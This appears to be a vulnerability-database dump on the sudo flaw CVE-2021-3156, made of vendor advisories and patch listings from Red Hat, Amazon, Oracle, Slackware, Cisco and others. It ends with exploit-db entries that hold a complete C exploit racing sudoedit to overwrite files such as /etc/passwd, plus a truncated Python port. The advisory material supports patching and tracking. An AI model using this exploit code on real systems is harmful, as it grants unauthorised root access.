`exploit/osx/browser/safari_proxy_object_type_confusion` exploit module for Mac OSX 10.13.1 and 10.13.2.\n * [#14721](<https://github.com/rapid7/metasploit-framework/pull/14721>) from [bcoles](<https://github.com/bcoles>) This adds a target for Debian 10 to the sudo exploit [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>).\n * [#14728](<https://github.com/rapid7/metasploit-framework/pull/14728>) from [FireFart](<https://github.com/FireFart>) Updates have been made to `lib/msf/core/module/reference.rb` as well as associated tools and documentation to update old WPVDB links with the new WPVDB domain and to also ensure that the new URL format is properly checked in the respective tools.\n * [#14725](<https://github.com/rapid7/metasploit-framework/pull/14725>) by [h00die](<https://github.com/h00die>) moves creds to a default-cred &quot;userpass&quot; list instead of splitting known cred pairs across files.\n\n## Bugs fixed\n\n * [#14714](<https://github.com/rapid7/metasploit-framework/pull/14714>) from [adfoster-r7](<https://github.com/adfoster-r7>) Updates the sqlite gem in preparation for Ruby 3.0 support &amp; fixes SQLite3 deprecation warning.\n * [#14720](<https://github.com/rapid7/metasploit-framework/pull/14720>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixed an issue in the `lib/msf/core/exploit/remote/http_client.rb` and `lib/msf/core/opt_http_rhost_url.rb` libraries where the `VHOST` datastore variable would be set incorrectly if a user used an `/etc/hosts` entry for resolving a hostname to an IP address.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.29...6.0.30](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-04T11%3A13%3A25-06%3A00..2021-02-11T08%3A23%3A00-06%3A00%22>)\n * [Full diff 6.0.29...6.0.30](<https://github.com/rapid7/metasploit-framework/compare/6.0.29...6.0.30>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-12T19:26:37", "published": "2021-02-12T19:26:37", "id": "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C", "href": "https://blog.rapid7.com/2021/02/12/metasploit-wrap-up-98/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2021-02-04T17:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The update fixes the vulnerability in sudo registered as CVE-2021-3156. The new sudo packages are available for Virtuozzo Hybrid Server 7.x and Virtuozzo 6.\n**Vulnerability id:** CVE-2021-3156\nA flaw was found in sudo. A heap-based buffer overflow was found in the way sudo parses command line arguments. This flaw is exploitable by any local user who can execute the sudo command (by default, any local user can execute sudo) without authentication. Successful exploitation of this flaw could lead to privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n\n", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "VZA-2021-004", "href": "https://help.virtuozzo.com/s/article/VZA-2021-004", "title": "[Important] [Security] Fix for a vulnerability in sudo, CVE-2021-3156, for Virtuozzo Hybrid Server 7.x and Virtuozzo 6", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T17:18:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "This update provides a security fix.\n**Vulnerability id:** VSTOR-40614\nFix for a vulnerability in sudo known as CVE-2021-3156.\n\n", "edition": 3, "modified": "2020-02-03T00:00:00", "published": "2020-02-03T00:00:00", "id": "VZA-2021-005", "href": "https://help.virtuozzo.com/s/article/VZA-2021-005", "title": "[Important] [Security] Virtuozzo Hybrid Infrastructure 4.0 Update 1.2 (4.0.1-49)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2021-02-04T15:43:18", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "**Issue Overview:**\n\nWhen sudo runs a command in shell mode, either via the -s or -i command line option, it escapes special characters in the command's arguments with a backslash. The sudoers policy plugin will then remove the escape characters from the arguments before evaluating the sudoers policy (which doesn't expect the escape characters) if the command is being run in shell mode. ([CVE-2021-3156 __](<https://access.redhat.com/security/cve/CVE-2021-3156>))\n\n \n**Affected Packages:** \n\n\nsudo\n\n \n**Issue Correction:** \nRun _yum update sudo_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n sudo-debuginfo-1.8.23-9.56.amzn1.i686 \n sudo-devel-1.8.23-9.56.amzn1.i686 \n sudo-1.8.23-9.56.amzn1.i686 \n \n src: \n sudo-1.8.23-9.56.amzn1.src \n \n x86_64: \n sudo-1.8.23-9.56.amzn1.x86_64 \n sudo-devel-1.8.23-9.56.amzn1.x86_64 \n sudo-debuginfo-1.8.23-9.56.amzn1.x86_64 \n \n \n", "edition": 2, "modified": "2021-01-26T00:11:00", "published": "2021-01-26T00:11:00", "id": "ALAS-2021-1478", "href": "https://alas.aws.amazon.com/ALAS-2021-1478.html", "title": "Important: sudo", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T15:40:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "**Issue Overview:**\n\nWhen sudo runs a command in shell mode, either via the -s or -i command line option, it escapes special characters in the command's arguments with a backslash. The sudoers policy plugin will then remove the escape characters from the arguments before evaluating the sudoers policy (which doesn't expect the escape characters) if the command is being run in shell mode. ([CVE-2021-3156 __](<https://access.redhat.com/security/cve/CVE-2021-3156>))\n\n \n**Affected Packages:** \n\n\nsudo\n\n \n**Issue Correction:** \nRun _yum update sudo_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n sudo-1.8.23-4.amzn2.2.1.aarch64 \n sudo-devel-1.8.23-4.amzn2.2.1.aarch64 \n sudo-debuginfo-1.8.23-4.amzn2.2.1.aarch64 \n \n i686: \n sudo-1.8.23-4.amzn2.2.1.i686 \n sudo-devel-1.8.23-4.amzn2.2.1.i686 \n sudo-debuginfo-1.8.23-4.amzn2.2.1.i686 \n \n src: \n sudo-1.8.23-4.amzn2.2.1.src \n \n x86_64: \n sudo-1.8.23-4.amzn2.2.1.x86_64 \n sudo-devel-1.8.23-4.amzn2.2.1.x86_64 \n sudo-debuginfo-1.8.23-4.amzn2.2.1.x86_64 \n \n \n", "edition": 2, "modified": "2021-01-25T23:09:00", "published": "2021-01-25T23:09:00", "id": "ALAS2-2021-1590", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1590.html", "title": "Important: sudo", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-02-04T11:50:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:30:22", "published": "2021-01-26T23:57:03", "id": "RHSA-2021:0219", "href": "https://access.redhat.com/errata/RHSA-2021:0219", "type": "redhat", "title": "(RHSA-2021:0219) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:00", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:16:25", "published": "2021-01-26T23:56:10", "id": "RHSA-2021:0226", "href": "https://access.redhat.com/errata/RHSA-2021:0226", "type": "redhat", "title": "(RHSA-2021:0226) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:33", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:37:18", "published": "2021-01-27T00:01:35", "id": "RHSA-2021:0224", "href": "https://access.redhat.com/errata/RHSA-2021:0224", "type": "redhat", "title": "(RHSA-2021:0224) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:51:02", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:46:39", "published": "2021-01-26T23:54:37", "id": "RHSA-2021:0221", "href": "https://access.redhat.com/errata/RHSA-2021:0221", "type": "redhat", "title": "(RHSA-2021:0221) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:12", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:55:03", "published": "2021-01-26T23:59:36", "id": "RHSA-2021:0222", "href": "https://access.redhat.com/errata/RHSA-2021:0222", "type": "redhat", "title": "(RHSA-2021:0222) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:49:13", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:16:10", "published": "2021-01-26T23:53:36", "id": "RHSA-2021:0218", "href": "https://access.redhat.com/errata/RHSA-2021:0218", "type": "redhat", "title": "(RHSA-2021:0218) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:49:14", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:16:29", "published": "2021-01-26T23:57:45", "id": "RHSA-2021:0220", "href": "https://access.redhat.com/errata/RHSA-2021:0220", "type": "redhat", "title": "(RHSA-2021:0220) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:49:34", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:30:07", "published": "2021-01-27T00:02:19", "id": "RHSA-2021:0225", "href": "https://access.redhat.com/errata/RHSA-2021:0225", "type": "redhat", "title": "(RHSA-2021:0225) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:55:04", "published": "2021-01-27T00:00:30", "id": "RHSA-2021:0223", "href": "https://access.redhat.com/errata/RHSA-2021:0223", "type": "redhat", "title": "(RHSA-2021:0223) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:51", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:21:54", "published": "2021-01-26T23:52:40", "id": "RHSA-2021:0227", "href": "https://access.redhat.com/errata/RHSA-2021:0227", "type": "redhat", "title": "(RHSA-2021:0227) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2021-02-04T15:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "[1.8.6p3-29.0.2.el6_10.3]\n- backport the fix CVE-2021-3156.patch from ol7.", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "ELSA-2021-9019", "href": "http://linux.oracle.com/errata/ELSA-2021-9019.html", "title": "sudo security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T15:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "[1.8.23-10.1]\n- RHEL 7.9.Z ERRATUM\n- CVE-2021-3156\nResolves: rhbz#1917729", "edition": 3, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "ELSA-2021-0221", "href": "http://linux.oracle.com/errata/ELSA-2021-0221.html", "title": "sudo security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T15:36:37", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "[1.8.29-6.1]\n- RHEL 8.3.Z ERRATUM\n- CVE-2021-3156\nResolves: rhbz#1917732", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "ELSA-2021-0218", "href": "http://linux.oracle.com/errata/ELSA-2021-0218.html", "title": "sudo security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2021-02-04T12:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "New sudo packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/sudo-1.9.5p2-i586-1_slack14.2.txz: Upgraded.\n When invoked as sudoedit, the same set of command line options\n are now accepted as for \"sudo -e\". The -H and -P options are\n now rejected for sudoedit and \"sudo -e\" which matches the sudo\n 1.7 behavior. This is part of the fix for CVE-2021-3156.\n Fixed a potential buffer overflow when unescaping backslashes\n in the command's arguments. Normally, sudo escapes special\n characters when running a command via a shell (sudo -s or sudo\n -i). However, it was also possible to run sudoedit with the -s\n or -i flags in which case no escaping had actually been done,\n making a buffer overflow possible. This fixes CVE-2021-3156.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3156\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/sudo-1.9.5p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/sudo-1.9.5p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/sudo-1.9.5p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/sudo-1.9.5p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/sudo-1.9.5p2-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/sudo-1.9.5p2-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.9.5p2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/sudo-1.9.5p2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n047bb22ce157548126d16430c3a374ef sudo-1.9.5p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7fbd3e885d8cc9b3cee66cdefeeba9e3 sudo-1.9.5p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n261ca55be2533f11b224e806e1acd554 sudo-1.9.5p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n0a261cd2ba3aa541d294d69f4bed5c2f sudo-1.9.5p2-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n00df3b1ea402b263fbf63bd411f99a77 sudo-1.9.5p2-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n4f29ad52ed440334c591ee530362e384 sudo-1.9.5p2-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n90296d19fb80c3fab70158febfba1d54 ap/sudo-1.9.5p2-i586-1.txz\n\nSlackware x86_64 -current package:\na3c31d280a60d4ea59922a60410072d9 ap/sudo-1.9.5p2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg sudo-1.9.5p2-i586-1_slack14.2.txz", "modified": "2021-01-26T21:34:51", "published": "2021-01-26T21:34:51", "id": "SSA-2021-026-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.461226", "type": "slackware", "title": "[slackware-security] sudo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2021-02-22T22:34:51", "bulletinFamily": "software", "cvelist": ["CVE-2021-3156"], "description": "A vulnerability in the command line parameter parsing code of Sudo could allow an authenticated, local attacker to execute commands or binaries with root privileges.\n\nThe vulnerability is due to improper parsing of command line parameters that may result in a heap-based buffer overflow. An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the sudoedit command with crafted parameters or by executing a binary exploit. A successful exploit could allow the attacker to execute commands or binaries with root privileges.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM\"]", "modified": "2021-02-22T21:38:52", "published": "2021-01-29T21:30:00", "id": "CISCO-SA-SUDO-PRIVESC-JAN2021-QNYQFCM", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM", "type": "cisco", "title": "Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2021-02-03T20:28:36", "description": "", "published": "2021-02-03T00:00:00", "type": "exploitdb", "title": "Sudo 1.9.5p1 - &#039;Baron Samedit &#039; Heap-Based Buffer Overflow Privilege Escalation (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-03T00:00:00", "id": "EDB-ID:49522", "href": "https://www.exploit-db.com/exploits/49522", "sourceData": "# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)\r\n# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty\r\n# Date: 30.01.2021\r\n# Vendor: https://www.sudo.ws/\r\n# Link: https://www.sudo.ws/download.html\r\n# CVE: CVE-2021-3156\r\n\r\n[+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021\r\n\r\n[Exploit Program Code]\r\n\r\n// Exploit by @gf_256 aka cts\r\n// With help from r4j\r\n// Debug by @nu11secur1ty\r\n// Original advisory by Baron Samedit of Qualys\r\n\r\n// Tested on Ubuntu 18.04 and 20.04 & 20.04.01\r\n// You will probably need to adjust RACE_SLEEP_TIME.\r\n\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <assert.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <sys/types.h>\r\n#include <sys/resource.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <pwd.h>\r\n\r\n// !!! best value of this varies from system-to-system !!!\r\n// !!! you will probably need to tune this !!!\r\n#define RACE_SLEEP_TIME 10000\r\n\r\nchar *target_file;\r\nchar *src_file;\r\n\r\nsize_t query_target_size()\r\n{\r\n struct stat st;\r\n stat(target_file, &st);\r\n return st.st_size;\r\n}\r\n\r\nchar* read_src_contents()\r\n{\r\n FILE* f = fopen(src_file, \"rb\");\r\n if (!f) {\r\n puts(\"oh no baby what are you doing :(\");\r\n abort();\r\n }\r\n fseek(f, 0, SEEK_END);\r\n long fsize = ftell(f);\r\n fseek(f, 0, SEEK_SET);\r\n char *content = malloc(fsize + 1);\r\n fread(content, 1, fsize, f);\r\n fclose(f);\r\n return content;\r\n}\r\n\r\nchar* get_my_username()\r\n{\r\n // getlogin can return incorrect result (for example, root under su)!\r\n struct passwd *pws = getpwuid(getuid());\r\n return strdup(pws->pw_name);\r\n}\r\n\r\nint main(int my_argc, char **my_argv)\r\n{\r\n puts(\"CVE-2021-3156 PoC by @gf_256\");\r\n puts(\"original advisory by Baron Samedit\");\r\n\r\n if (my_argc != 3) {\r\n puts(\"./meme <target file> <src file>\");\r\n puts(\"Example: ./meme /etc/passwd my_fake_passwd_file\");\r\n return 1;\r\n }\r\n target_file = my_argv[1];\r\n src_file = my_argv[2];\r\n printf(\"we will overwrite %s with stuff from %s\\n\", target_file, src_file);\r\n\r\n char* myusername = get_my_username();\r\n printf(\"hi, my name is %s\\n\", myusername);\r\n\r\n size_t initial_size = query_target_size();\r\n printf(\"%s is %zi big right now\\n\", target_file, initial_size);\r\n\r\n char* stuff_to_write = read_src_contents();\r\n\r\n char memedir[1000];\r\n char my_symlink[1000];\r\n char overflow[1000];\r\n\r\n char* bigstuff = calloc(1,0x10000);\r\n memset(bigstuff, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address\r\n\r\n char *argv[] = {\"/usr/bin/sudoedit\", \"-A\", \"-s\", \"\\\\\", overflow, NULL\r\n };\r\n\r\n char *envp[] = {\r\n \"\\n\\n\\n\\n\\n\", // put some newlines here to separate our real contents from the junk stuff_to_write,\r\n \"SUDO_ASKPASS=/bin/false\", \"LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\", bigstuff, NULL\r\n };\r\n\r\n puts(\"ok podracing time bitches\");\r\n\r\n // Boom =)\r\n // for (int i = 0; i < 5000; i++)\r\n for (int i = 0; i < 3000; i++) {\r\n sprintf(memedir, \"ayylmaobigchungussssssssssss00000000000000000000000000%08d\", i);\r\n sprintf(overflow, \"11111111111111111111111111111111111111111111111111111111%s\", memedir);\r\n sprintf(my_symlink, \"%s/%s\", memedir, myusername);\r\n puts(memedir);\r\n\r\n if (access(memedir, F_OK) == 0) {\r\n printf(\"dude, %s already exists, do it from a clean working dir\\n\", memedir);\r\n return 1;\r\n }\r\n\r\n pid_t childpid = fork();\r\n if (childpid) { // parent\r\n usleep(RACE_SLEEP_TIME);\r\n mkdir(memedir, 0700);\r\n symlink(target_file, my_symlink);\r\n waitpid(childpid, 0, 0);\r\n } else { // child\r\n setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability\r\n execve(\"/usr/bin/sudoedit\", argv, envp); // noreturn\r\n puts(\"execve fails?!\");\r\n abort();\r\n }\r\n\r\n if (query_target_size() != initial_size) {\r\n puts(\"target file has a BRUH MOMENT!!!! SUCCess???\");\r\n system(\"xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'\");\r\n// ayy lmao\r\n return 0;\r\n }\r\n }\r\n\r\n puts(\"Failed?\");\r\n puts(\"if all the meme dirs are owned by root, the usleep needs to be decreased.\");\r\n puts(\"if they're all owned by you, the usleep needs to be increased\");\r\n\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49522"}, {"lastseen": "2021-02-03T20:28:36", "description": "", "published": "2021-02-03T00:00:00", "type": "exploitdb", "title": "Sudo 1.9.5p1 - &#039;Baron Samedit &#039; Heap-Based Buffer Overflow Privilege Escalation (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-03T00:00:00", "id": "EDB-ID:49521", "href": "https://www.exploit-db.com/exploits/49521", "sourceData": "# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)\r\n# Date: 2021-02-02\r\n# Exploit Author: West Shepherd\r\n# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.\r\n# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31\r\n# CVE : CVE-2021-3156\r\n# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.\r\n# Sources:\r\n# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\r\n# (2) https://github.com/stong/CVE-2021-3156\r\n# Requirements: Python3\r\n\r\n#!/usr/bin/python3\r\nimport os\r\nimport pwd\r\nimport time\r\nimport sys\r\nimport argparse\r\n\r\n\r\nclass Exploit(object):\r\n username = ''\r\n size = 0\r\n data = ''\r\n\r\n def __init__(self, source, target, sleep):\r\n self.sleep = sleep\r\n self.source = source\r\n self.target = target\r\n\r\n @staticmethod\r\n def readFile(path):\r\n return open(path, 'r').read()\r\n\r\n @staticmethod\r\n def getUser():\r\n return pwd.getpwuid(os.getuid())[0]\r\n\r\n @staticmethod\r\n def getSize(path):\r\n return os.stat(path).st_size\r\n\r\n def main(self):\r\n self.username = self.getUser()\r\n self.data = self.readFile(self.source)\r\n self.size = self.getSize(self.target)\r\n environ = {\r\n '\\n\\n\\n\\n\\n': '\\n' + self.data,\r\n 'SUDO_ASKPASS': '/bin/false',\r\n 'LANG':\r\n'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',\r\n 'A': 'A' * 0xffff\r\n }\r\n for i in range(5000):\r\n directory =\r\n'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i\r\n overflow =\r\n'11111111111111111111111111111111111111111111111111111111%s' %\r\ndirectory\r\n\r\n if os.path.exists(directory):\r\n sys.stdout.write('file exists %s\\n' % directory)\r\n continue\r\n\r\n child = os.fork()\r\n os.environ = environ\r\n if child:\r\n sys.stdout.write('[+] parent %d \\n' % i)\r\n sys.stdout.flush()\r\n time.sleep(self.sleep)\r\n if not os.path.exists(directory):\r\n 